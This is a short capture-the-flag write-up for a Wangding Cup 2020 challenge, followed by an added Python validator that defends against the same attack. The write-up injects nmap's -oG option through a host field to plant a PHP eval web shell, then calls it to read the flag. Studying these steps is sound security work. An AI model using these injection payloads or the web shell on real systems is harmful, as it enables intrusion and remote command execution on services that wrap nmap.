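[Wangding Cup 2020, Zhuque Group] Nmap
The home page looks like this
Try to determine whether injection is possible (pointless question, obviously it is)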
localhost' #
' -oG shell.php <?php eval($_GET["cmd"]);?> #
Hacker...
Hmm, I was careless
It has probably filtered out php
' -oG shell.phtml <? eval($_GET["cmd"]);?> #
Host maybe down
/shell.phtml?cmd=system('cat /flag');
# Nmap 6.47 scan initiated Sun Nov 27 04:26:32 2022 as: nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/824ef -oG shell.phtml \ flag{b868b5bd-41f0-4933-97f5-930bd42b73a3} #' # Nmap done at Sun Nov 27 04:26:33 2022 -- 0 IP addresses (0 hosts up) scanned in 0.90 seconds
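Added example, not part of the original write-up or the challenge's code: a defender-side check that rejects host values like the ones above before they reach nmap. It assumes the application puts a user-supplied host on the command line seen in the output; is_valid_target, build_nmap_argv and the xml_path parameter are hypothetical names.

```python
import ipaddress
import re

# Fixed options copied from the command line visible in the scan output above.
NMAP_BASE = ["nmap", "-Pn", "-T4", "-F", "--host-timeout", "1000ms"]

# One DNS label: letters, digits, hyphens; never starts or ends with a hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def is_valid_target(value):
    """Accept only a literal IP address or a plain hostname."""
    # '%' is refused first: IPv6 scope ids are free-form text in Python's
    # ipaddress module and would let spaces and quotes through.
    if "%" not in value:
        try:
            ipaddress.ip_address(value)
            return True
        except ValueError:
            pass
    if not value or len(value) > 253:
        return False
    # Whitespace, quotes, '#', '<', '?' and a leading '-' all fail the label
    # pattern, so neither shell syntax nor an extra nmap option can get in.
    return all(_LABEL.fullmatch(label) for label in value.split("."))


def build_nmap_argv(target, xml_path):
    """Return an argv list meant for subprocess.run(argv), i.e. no shell.

    xml_path is chosen by the server (hypothetical parameter), never by the user.
    """
    if not is_valid_target(target):
        raise ValueError("rejected scan target")
    return NMAP_BASE + ["-oX", xml_path, target]


if __name__ == "__main__":
    # Constructed samples: the first rejected value is the probe from this
    # page, the second is a constructed option-injection string.
    for sample in ["localhost", "127.0.0.1", "localhost' #", "' -oG out.txt #"]:
        print(repr(sample), "->", "ok" if is_valid_target(sample) else "rejected")
```

Because the target is validated against an allowlist and passed as a single argv element, the output-file options stay under the server's control.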